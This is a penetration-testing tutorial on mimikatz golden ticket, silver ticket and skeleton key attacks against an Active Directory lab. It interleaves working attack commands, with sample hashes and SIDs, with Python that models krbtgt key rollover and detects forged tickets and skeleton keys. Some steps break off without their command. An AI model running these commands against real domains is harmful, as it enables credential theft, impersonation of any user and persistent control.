IN THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES: 1. GOLDEN TICKET, 2. SILVER TICKET AND 3. SKELETON KEY
GOLDEN TICKET:
A golden ticket is a special token that is created by penetration testers using the Security Identifier (SID) of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT account. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT (Pass the Ticket).
This is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed with the krbtgt account hash; it is encrypted only. This golden ticket allows anyone to impersonate any user, with the privileges associated with the impersonated user, on systems within the domain. To make this type of attack even more awesome, consider that changing the password of the krbtgt account once has zero effect on mitigating this attack on Active Directory.
PRACTICAL DEMO:
- Fire up Windows Server 2022 and log in as either Domain Admin or SQLService.
- Make sure mimikatz is installed beforehand.
- Open PowerShell with admin privileges, and launch mimikatz.
- Use Mimikatz to extract the domain SID and the Kerberos TGT account (krbtgt) NTLM hash using the following command:
lsadump::lsa /inject /name:krbtgt

- Next, use Mimikatz to create a golden ticket by providing the domain SID and the krbtgt NTLMv1 hash using the following command:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket
The username specified in the preceding command does not necessarily need to be a valid user on the domain. Furthermore, using the ID of 500 lets us specify the built-in administrator account of the domain. The /ticket option lets us specify the file name of the ticket when it is created.
The golden ticket is stored offline within the Mimikatz directory. This golden ticket will allow a penetration tester to access any system on the domain using the current session.
- Creating a super golden ticket for the maximum validity period:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket
The /endin option lets us specify the validity of the ticket in minutes; the value above is the maximum accepted.
- Pass the ticket with mimikatz:
kerberos::ptt golden_ticket

- To open a Command Prompt with the golden ticket session, use the following Mimikatz command:
misc::cmd

- In the cmd, try these two commands: whoami and klist.
As shown in the preceding screenshot, when the whoami command is executed, the output shows that the sqladmin account is currently logged on to the system, but the klist command reveals that this Command Prompt session is using the NotAdmin user with the golden ticket. Therefore, you can access any device on the network using the golden ticket from this Command Prompt session.
As previously mentioned in this chapter, changing the krbtgt account password once does not invalidate the tickets created with the krbtgt hash; however, changing the password twice will invalidate the tickets.
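The reason a single krbtgt reset is not enough is that the KDC keeps accepting tickets protected with the previous krbtgt key as well as the current one, so a forged TGT survives exactly one reset. The toy model below is an added illustration of that rule; it is not the Kerberos protocol, Windows KDC code or mimikatz, and the ToyKdc class, the HMAC-based ticket format, the key version numbers (kvno) and the NotAdmin user are all assumptions made for the demo.

```python
import hashlib
import hmac
import os
import time

# Toy model of krbtgt key rollover (added illustration, not real KDC code).
# A TGT is a record authenticated with an HMAC under the krbtgt key of a
# given key version (kvno). Like the real KDC, the toy KDC honours tickets
# under the current krbtgt key and under the immediately previous one.


def _mac(key, ticket):
    body = f'{ticket["user"]}|{ticket["kvno"]}|{ticket["expires"]}'.encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def make_tgt(key, kvno, user, lifetime_s, now=None):
    """Build a ticket under `key`. The KDC does this for real users; an
    attacker holding a copy of the krbtgt key can do the same (golden ticket)."""
    now = time.time() if now is None else now
    ticket = {"user": user, "kvno": kvno, "expires": now + lifetime_s}
    ticket["mac"] = _mac(key, ticket)
    return ticket


class ToyKdc:
    def __init__(self):
        self.kvno = 1
        self.keys = {1: os.urandom(32)}          # kvno -> krbtgt key

    def reset_krbtgt(self):
        """One 'password change' of krbtgt: new key, kvno incremented."""
        self.kvno += 1
        self.keys[self.kvno] = os.urandom(32)

    def accepted_kvnos(self):
        # current key plus the previous one (n and n-1)
        return {self.kvno, self.kvno - 1}

    def validate_tgt(self, ticket, now=None):
        """True if the ticket verifies under a still-accepted krbtgt key
        and has not expired."""
        now = time.time() if now is None else now
        if ticket["kvno"] not in self.accepted_kvnos():
            return False
        key = self.keys.get(ticket["kvno"])
        if key is None:
            return False
        return hmac.compare_digest(_mac(key, ticket), ticket["mac"]) and now < ticket["expires"]


def rollover_scenario():
    """Return whether a forged TGT is accepted: before any reset,
    after one reset, after two resets."""
    kdc = ToyKdc()
    stolen_key, stolen_kvno = kdc.keys[kdc.kvno], kdc.kvno   # attacker's copy
    # ten-year lifetime mirrors the "super golden ticket" idea above
    forged = make_tgt(stolen_key, stolen_kvno, "NotAdmin", lifetime_s=10 * 365 * 86400)
    before = kdc.validate_tgt(forged)
    kdc.reset_krbtgt()
    after_one = kdc.validate_tgt(forged)     # still valid: previous key honoured
    kdc.reset_krbtgt()
    after_two = kdc.validate_tgt(forged)     # rejected: key is two versions old
    return before, after_one, after_two


if __name__ == "__main__":
    print(rollover_scenario())               # (True, True, False)
```

The model also shows why the long /endin lifetime matters to a defender: expiry alone never removes the forged ticket, only the second key rollover does. Microsoft's forest-recovery guidance is to perform the two resets with enough time between them for replication to complete and for legitimate TGTs (default maximum lifetime 10 hours) to expire, otherwise valid users are locked out along with the forged ticket.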
Silver ticket:
- Open the domain controller and log in as either the service account or DOMAIN ADMIN.
- Then load mimikatz in PowerShell (opened as admin).
- Next, retrieve the SID of the domain and the NTLM hashes of a service account with a registered SPN or a computer account:
lsadump::lsa /patch
(Screenshot: hash of the DC, HYDRA-DC)

You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.
- Next, let's use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the Domain Controller (DC1, HYDRA-DC in the command below), and the target as the domain controller. The service to impersonate will be HOST:
kerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket
- Now use the following command to perform PTT as well as get a cmd session:
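From the defender's side, the two forged-ticket techniques above leave different traces: a golden ticket is presented to the KDC, so the domain controller logs a service ticket request (event 4769) for an account that never obtained a TGT (no event 4768), possibly with a name that does not exist and with RC4 encryption in an AES domain; a silver ticket never touches the KDC, so the only trace is the logon (event 4624, package Kerberos) on the target host, where the account name or SID in the forged PAC does not match the directory. The detection logic below is an added example, not code from the page or from mimikatz; the event records are constructed dicts whose field names follow the Windows Security event XML, and the DIRECTORY snapshot, the timestamps and the SIDs used for the samples are assumptions.

```python
# Constructed directory snapshot (assumption): sAMAccountName -> objectSid.
# The domain SID is the one used in the mimikatz commands above.
DOMAIN_SID = "S-1-5-21-2562431693-949040921-1798036828"
DIRECTORY = {
    "sqladmin": DOMAIN_SID + "-1105",
    "Administrator": DOMAIN_SID + "-500",
    "HYDRA-DC$": DOMAIN_SID + "-1000",
}

RC4_HMAC = 0x17            # TicketEncryptionType for RC4; AES types are 0x11/0x12
LOOKBACK_S = 10 * 3600     # default maximum TGT lifetime in an AD domain


def detect_forged_tickets(events, directory, expect_aes=True, lookback_s=LOOKBACK_S):
    """Return (event, reason) pairs for events that look like forged tickets.

    Golden ticket (DC side): a 4769 service-ticket request whose account is not
    in the directory, has no successful 4768 within lookback_s, or uses RC4
    although the domain is expected to issue AES tickets.
    Silver ticket (host side): a Kerberos 4624 logon for an account that does
    not exist, or whose name/SID pair does not match the directory.
    """
    findings = []
    last_tgt = {}                              # account -> time of last 4768 success
    for ev in sorted(events, key=lambda e: e["time"]):
        eid, acct = ev["EventID"], ev["TargetUserName"]
        if eid == 4768 and ev.get("Status") == "0x0":
            last_tgt[acct] = ev["time"]
        elif eid == 4769:
            if acct not in directory:
                findings.append((ev, "4769 for account that does not exist in AD"))
            elif acct not in last_tgt or ev["time"] - last_tgt[acct] > lookback_s:
                findings.append((ev, "4769 with no matching 4768 in lookback window"))
            if expect_aes and ev.get("TicketEncryptionType") == RC4_HMAC:
                findings.append((ev, "RC4 service ticket in an AES domain"))
        elif eid == 4624 and ev.get("AuthenticationPackageName") == "Kerberos":
            if acct not in directory:
                findings.append((ev, "Kerberos logon for account that does not exist in AD"))
            elif directory[acct] != ev.get("TargetUserSid"):
                findings.append((ev, "Kerberos logon where account SID does not match AD"))
    return findings


# Constructed sample events (not real logs); T0 is an arbitrary epoch time.
T0 = 1_700_000_000
SAMPLE_EVENTS = [
    # legitimate: TGT request, then a service ticket for the same account
    {"time": T0, "EventID": 4768, "TargetUserName": "sqladmin",
     "Status": "0x0", "TicketEncryptionType": 0x12},
    {"time": T0 + 60, "EventID": 4769, "TargetUserName": "sqladmin",
     "ServiceName": "HYDRA-DC$", "TicketEncryptionType": 0x12},
    # golden ticket as in the demo: NotAdmin never requested a TGT, RC4 ticket
    {"time": T0 + 120, "EventID": 4769, "TargetUserName": "NotAdmin",
     "ServiceName": "HYDRA-DC$", "TicketEncryptionType": 0x17},
    # silver ticket: Kerberos network logon on HYDRA-DC with a forged PAC
    {"time": T0 + 180, "EventID": 4624, "TargetUserName": "SilverTicket",
     "TargetUserSid": DOMAIN_SID + "-1234",
     "AuthenticationPackageName": "Kerberos", "LogonType": 3},
    # legitimate Kerberos network logon
    {"time": T0 + 240, "EventID": 4624, "TargetUserName": "sqladmin",
     "TargetUserSid": DIRECTORY["sqladmin"],
     "AuthenticationPackageName": "Kerberos", "LogonType": 3},
]

if __name__ == "__main__":
    for ev, reason in detect_forged_tickets(SAMPLE_EVENTS, DIRECTORY):
        print(ev["EventID"], ev["TargetUserName"], "->", reason)
```

The name and SID checks only catch the lazy variant shown in the demo (a made-up username); the durable signal is a 4769 with no earlier 4768, which requires collecting the Security log from every domain controller, since the TGT may have been issued by a different DC than the one that issued the service ticket. The silver-ticket check needs the 4624 events of the target host itself, because the domain controller never sees that ticket.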


SKELETON KEY:
- Use the following commands to enable the Mimikatz drivers on the disk of the domain controller and create the skeleton key:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
- Then open a command prompt using that skeleton key.

When using the skeleton key, you can access any device on the domain using a valid username and the password mimikatz. However, keep in mind that any host you're attempting to access with the skeleton key needs to authenticate to the domain controller on the network. If the domain controller reboots, the skeleton key is lost; this is an important operational detail. Since Mimikatz manipulates authentication processes that are resident in memory, the change does not persist through reboots unless specific measures are taken to ensure persistence.
- In the new cmd, use the command powershell to spawn a PowerShell session.
- Access the domain controller using the following command:
Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\Administrator
- Provide the password of the domain admin:

- Use the following commands to verify:
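Because the skeleton key lives only in the LSASS memory of the domain controller, the defender's hunt is about the traces the steps above leave rather than files on disk: the "!+" step installs the mimikatz kernel driver as a service (System event 7045 with a kernel-mode driver whose image is mimidrv.sys), and the patched LSASS only answers the master password over RC4, so accounts that normally get AES tickets suddenly receive RC4 TGTs (event 4768 with TicketEncryptionType 0x17), the encryption downgrade that Microsoft's identity-threat products alert on. The hunting logic below is an added example, not code from the page or from mimikatz; the event records are constructed dicts modelled on the Windows event XML, and the SUPPORTED_ENCTYPES snapshot (values of msDS-SupportedEncryptionTypes) is an assumption.

```python
RC4_HMAC = 0x17                                  # TicketEncryptionType in 4768
ENCTYPE_RC4, ENCTYPE_AES128, ENCTYPE_AES256 = 0x4, 0x8, 0x10   # msDS-SupportedEncryptionTypes bits

# Constructed snapshot (assumption) of msDS-SupportedEncryptionTypes per account.
SUPPORTED_ENCTYPES = {
    "sqladmin": ENCTYPE_AES128 | ENCTYPE_AES256,
    "Administrator": ENCTYPE_AES128 | ENCTYPE_AES256,
    "legacyapp": ENCTYPE_RC4,                    # genuinely RC4-only, not a downgrade
}


def supports_aes(flags):
    return bool(flags & (ENCTYPE_AES128 | ENCTYPE_AES256))


def hunt_skeleton_key(events, enctypes):
    """Return (event, reason) pairs pointing at a possible skeleton key.

    Signal 1: successful 4768 issuing an RC4 TGT to an account whose
    directory attributes say it has AES keys (encryption downgrade).
    Signal 2: 7045 service install of a kernel-mode driver whose image is
    the mimikatz driver (the "!+" command in the demo).
    """
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4768 and ev.get("Status") == "0x0" \
                and ev.get("TicketEncryptionType") == RC4_HMAC:
            acct = ev["TargetUserName"]
            if supports_aes(enctypes.get(acct, 0)):
                findings.append((ev, f"RC4 TGT issued to AES-capable account {acct}"))
        elif eid == 7045:
            path = ev.get("ImagePath", "").lower()
            if ev.get("ServiceType") == "kernel mode driver" and "mimidrv" in path:
                findings.append((ev, "mimikatz kernel driver installed"))
    return findings


def downgraded_accounts(events, enctypes):
    """Distinct accounts affected by the downgrade signal, for a quick summary."""
    return sorted({ev["TargetUserName"] for ev, reason in hunt_skeleton_key(events, enctypes)
                   if reason.startswith("RC4 TGT")})


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "sqladmin", "Status": "0x0",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.25"},        # downgrade
    {"EventID": 4768, "TargetUserName": "legacyapp", "Status": "0x0",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.30"},        # expected RC4
    {"EventID": 4768, "TargetUserName": "Administrator", "Status": "0x0",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.10"},        # normal AES
    {"EventID": 7045, "ServiceName": "mimidrv", "ServiceType": "kernel mode driver",
     "ImagePath": "C:\\Tools\\mimidrv.sys", "StartType": "demand start"},
]

if __name__ == "__main__":
    for ev, reason in hunt_skeleton_key(SAMPLE_EVENTS, SUPPORTED_ENCTYPES):
        print(ev["EventID"], reason)
```

A single RC4 TGT for an account with msDS-SupportedEncryptionTypes unset or RC4-only is normal, which is why the check is keyed on the directory attribute; the skeleton key shows up as a cluster of downgrades across otherwise AES-capable accounts from one domain controller. Since the patch does not survive a reboot, the hunt has to run continuously rather than once, and a 7045 for the driver is worth an alert on its own even with no downgrade yet visible.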

Further reading:
• Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/Kerberos
• OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/
• OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/
• LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/T1557/001/
• Active Directory Security – https://adsecurity.org/